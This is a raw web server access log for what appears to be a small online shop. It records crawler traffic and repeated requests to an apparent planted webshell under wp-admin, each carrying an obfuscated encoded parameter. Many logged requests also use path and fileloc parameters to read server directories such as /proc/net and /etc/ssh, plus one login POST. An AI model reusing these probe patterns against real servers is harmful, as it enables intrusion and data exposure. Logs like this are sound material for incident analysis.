103.7.226.137 - - [06/Nov/2025:01:56:44 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323630342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393030342q6666333837303263386364383035316534613136373635656231333563333163222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:58:47 +0700] "GET /shopbrand1093762447?path=//var/run/net-snmp HTTP/2" 200 2544 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:58:53 +0700] "GET /shopbrand1093707564?path=//proc/net HTTP/2" 200 3002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:58:56 +0700] "GET /shopbrand1093762447?path=//proc/net HTTP/2" 200 3029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:58:59 +0700] "GET /shopbrand1093555954?path=//run/dbus HTTP/2" 200 2538 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:59:06 +0700] "GET /shopbrand1093762447?path=//var/php/apm/db HTTP/2" 200 2539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:57:06 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323632362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393032362q3538366630313862303561376333633232303365313065626161656433646434222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:59:11 +0700] "GET /shopbrand1093762447?path=//var/lve/php.dat.d HTTP/2" 200 3187 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:59:16 +0700] "GET /shopbrand1093555954?path=//etc/ssh HTTP/2" 200 2843 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:59:21 +0700] "GET /shopbrand1093762447?fileloc=//proc/net/udp&path=//proc/net HTTP/2" 200 2760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:59:27 +0700] "GET /shopbrand1093762447?fileloc=//proc/net/tcp&path=//proc/net HTTP/2" 200 7712 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:57:28 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323634382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393034382q3935613465326138383636626336333435646536613732376238633763663437222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:59:34 +0700] "GET /shopbrand1093762447?fileloc=//proc/net/raw&path=//proc/net HTTP/2" 200 2605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:59:38 +0700] "GET /shopbrand1093707564?fileloc=//proc/net/tcp&path=//proc/net HTTP/2" 200 8131 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:59:45 +0700] "GET /shopbrand1093707564?fileloc=//proc/net/raw&path=//proc/net HTTP/2" 200 2605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:59:49 +0700] "GET /shopbrand1093707564?fileloc=//proc/net/unix&path=//proc/net HTTP/2" 200 6468 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:57:50 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323637302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393037302q3437343964663532313931666638343566373963343764303966656265643837222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:59:56 +0700] "GET /shopbrand1093762447?fileloc=//proc/net/unix&path=//proc/net HTTP/2" 200 6467 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:00:00 +0700] "GET /shopbrand1093762447?fileloc=//proc/net/udp6&path=//proc/net HTTP/2" 200 2658 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:00:03 +0700] "GET /shopbrand1093762447?fileloc=//proc/net/tcp6&path=//proc/net HTTP/2" 200 3029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:00:09 +0700] "GET /shopbrand1093707564?fileloc=//proc/net/tcp6&path=//proc/net HTTP/2" 200 3075 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:58:12 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323639322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393039322q3430373635343964636535643961396562613135373737393234336163613766222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:00:13 +0700] "GET /shopbrand1093707564?fileloc=//proc/net/udp&path=//proc/net HTTP/2" 200 2760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:00:19 +0700] "GET /shopbrand1093707564?fileloc=//proc/net/udp6&path=//proc/net HTTP/2" 200 2658 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:00:23 +0700] "GET /shopbrand1093707564?fileloc=//proc/net/raw6&path=//proc/net HTTP/2" 200 2555 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:00:29 +0700] "GET /shopbrand1093707564?fileloc=//proc/net/dev&path=//proc/net HTTP/2" 200 2699 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:00:33 +0700] "GET /shopbrand1093762447?fileloc=//proc/net/dev&path=//proc/net HTTP/2" 200 2698 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:58:34 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323731342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393131342q3761356163383464383237323233663265653133396330366166303161616238222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:00:40 +0700] "GET /shopbrand1093555954?path=//usr/src HTTP/2" 200 2788 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:00:43 +0700] "GET /shopbrand1093555954?path=//var/run HTTP/2" 200 3244 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:00:50 +0700] "GET /shopbrand1093555954?path=//var/tmp HTTP/2" 200 2841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:00:53 +0700] "GET /shopbrand1093707564?path=//lib/jvm/java-11-openjdk-11.0.23.0.9-2.el7_9.x86_64/legal/java.base HTTP/2" 200 3230 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:00:57 +0700] "GET /shopbrand1093707564?path=//lib/jvm/java-11-openjdk-11.0.23.0.9-2.el7_9.x86_64/legal/java.rmi HTTP/2" 200 3018 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:58:57 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323733372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393133372q6263636233323861363564313264663238363865333436313732303531386661222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:01:03 +0700] "GET /shopbrand1093707564?path=//lib/jvm/java-11-openjdk-11.0.23.0.9-2.el7_9.x86_64/legal/java.sql HTTP/2" 200 3018 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:01:06 +0700] "GET /shopbrand1093555954?path=//var/run/net-snmp HTTP/2" 200 2544 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:01:12 +0700] "GET /shopbrand1093762447?fileloc=//proc/net/raw6&path=//proc/net HTTP/2" 200 2555 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:01:18 +0700] "GET /shopbrand1093707564?path=//lib/jvm/java-11-openjdk-11.0.23.0.9-2.el7_9.x86_64/legal/jdk.javadoc HTTP/2" 200 3156 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:59:19 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323735392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393135392q3339353966333664353338323964313765303832363764636539373939656130222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:01:22 +0700] "GET /shopbrand1093707564?path=//lib/jvm/java-11-openjdk-11.0.23.0.9-2.el7_9.x86_64/legal/java.naming HTTP/2" 200 3014 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:01:31 +0700] "GET /shopbrand1093571503?path=//usr/lib64/gtk-2.0/2.10.0 HTTP/2" 200 3039 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:01:38 +0700] "GET /shopbrand1093555954?path=//lib64 HTTP/2" 200 40346 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:59:41 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323738312p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393138312q6437613139663566303661393530613435633134343739353630383230303165222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:01:45 +0700] "GET /shopbrand1093707564?path=//lib/jvm/java-11-openjdk-11.0.23.0.9-2.el7_9.x86_64/legal/jdk.jfr HTTP/2" 200 3008 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:01:49 +0700] "GET /shopbrand1093707564?path=//lib/jvm/java-11-openjdk-11.0.23.0.9-2.el7_9.x86_64/legal/jdk.jdi HTTP/2" 200 2982 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.73.72 - - [06/Nov/2025:02:01:48 +0700] "GET /?shopbrand514343905?kg=0513223790 HTTP/1.1" 200 26185 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [06/Nov/2025:02:01:55 +0700] "GET /shopbrand1093707564?path=//lib/jvm/java-11-openjdk-11.0.23.0.9-2.el7_9.x86_64/legal/jdk.aot HTTP/2" 200 3008 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:01:59 +0700] "GET /shopbrand1093571503?path=//usr/lib64/gtk-2.0/2.10.0/engines HTTP/2" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.73.72 - - [06/Nov/2025:02:01:59 +0700] "GET /shopbrand543102292?kg=0541919522 HTTP/1.1" 200 26244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.7.226.137 - - [06/Nov/2025:02:00:03 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323830332p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393230332q6439646632363366323033373337396366356232353031616637326230636361222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:02:05 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libjasper.so.1&path=//lib64 HTTP/2" 200 144551 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.3 - - [06/Nov/2025:02:02:09 +0700] "GET /?shopbrand541803931?kg=0540623990 HTTP/1.1" 200 25805 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [06/Nov/2025:02:02:11 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libteam.so.5.6.0&path=//lib64 HTTP/2" 200 22256 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:02:18 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libnet.so.1&path=//lib64 HTTP/2" 200 40152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:00:25 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323832352p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393232352q6531653139316231306530623161333734633838363961666564613231626239222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:02:22 +0700] "GET /shopbrand1093555954?fileloc=//lib64/liblapacke.so.3.4&path=//lib64 HTTP/2" 200 592156 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:02:32 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libnl-xfrm-3.so.200.23.0&path=//lib64 HTTP/2" 200 31329 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:02:40 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libmariadb.so.3&path=//lib64 HTTP/2" 200 114668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:02:44 +0700] "GET /shopbrand1093707564?path=//lib/jvm/java-11-openjdk-11.0.23.0.9-2.el7_9.x86_64/legal/java.prefs HTTP/2" 200 3015 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:00:47 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323834372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393234372q3435313563666164303734616234386133393935643362363432346638303231222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:02:50 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libpanelw.so.5&path=//lib64 HTTP/2" 200 7380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:02:54 +0700] "GET /shopbrand1093707564?fileloc=//usr/lib64/libwmflite-0.2.so.7.0.1&path=//usr/lib64 HTTP/2" 200 49219 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.6 - - [06/Nov/2025:02:02:56 +0700] "GET /shopbrand1137450837?kg=1134973190 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.31 - - [06/Nov/2025:02:02:57 +0700] "GET /shopbrand1137531304?kg=1135053482 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [06/Nov/2025:02:03:00 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libmcrypt.so.4.4.8&path=//lib64 HTTP/2" 200 67679 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:03:08 +0700] "GET /shopbrand1093555954?path=//opt/liblve HTTP/2" 200 2968 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.89 - - [06/Nov/2025:02:03:10 +0700] "GET /shopbrand1137536044?kg=1135058210 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [06/Nov/2025:02:03:11 +0700] "GET /shopbrand1093707564?fileloc=//usr/lib64/libXrandr.so.2&path=//usr/lib64 HTTP/2" 200 19054 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.12 - - [06/Nov/2025:02:03:12 +0700] "GET /shopbrand1137444484?kg=1134966850 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.78 - - [06/Nov/2025:02:03:13 +0700] "GET /shopbrand1137247646?kg=1134770442 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.37 - - [06/Nov/2025:02:03:17 +0700] "GET /shopbrand1137447447?kg=1134969806 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [06/Nov/2025:02:03:18 +0700] "GET /shopbrand1093488824?path=//run/screen HTTP/2" 200 2523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:03:22 +0700] "GET /shopbrand1093707564?fileloc=//usr/lib64/libnfsidmap.so.0.3.0&path=//usr/lib64 HTTP/2" 200 16302 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:03:29 +0700] "GET /shopbrand1093762447?path=//var/lib HTTP/2" 200 2891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:03:32 +0700] "GET /shopbrand1093555954?fileloc=//lib64/librpmsign.so.1.2.2&path=//lib64 HTTP/2" 200 9267 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:03:36 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libxcb-composite.so.0&path=//lib64 HTTP/2" 200 5948 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:03:41 +0700] "GET /shopbrand1093555954?fileloc=//lib64/p11-kit-proxy.so&path=//lib64 HTTP/2" 200 263993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:03:52 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libdav1d.so.3&path=//lib64 HTTP/2" 200 348658 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:03:58 +0700] "GET /shopbrand1093555954?path=//lib64/gdk-pixbuf-2.0 HTTP/2" 200 2783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:04:07 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libnss_db.so&path=//lib64 HTTP/2" 200 13312 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:04:14 +0700] "GET /shopbrand1093555954?path=//lib64/sa HTTP/2" 200 2861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:04:17 +0700] "GET /shopbrand1093571503?path=//usr/lib64/gtk-2.0/2.10.0/printbackends HTTP/2" 200 2918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:04:22 +0700] "GET /shopbrand1093762447?path=//var/lib/net-snmp HTTP/2" 200 2832 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:04:27 +0700] "GET /shopbrand1093657736?path=//var/www HTTP/2" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:04:31 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libxcb-xinerama.so.0&path=//lib64 HTTP/2" 200 6109 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
15.235.182.184 - - [06/Nov/2025:02:04:35 +0700] "POST /wp-login.php HTTP/1.1" 200 4145 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
74.7.227.128 - - [06/Nov/2025:02:04:37 +0700] "GET /shopbrand1093555954?path=//lib64/ImageMagick-6.9.10 HTTP/2" 200 2831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.86 - - [06/Nov/2025:02:04:38 +0700] "GET /shopbrand1137270267?kg=1134793014 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
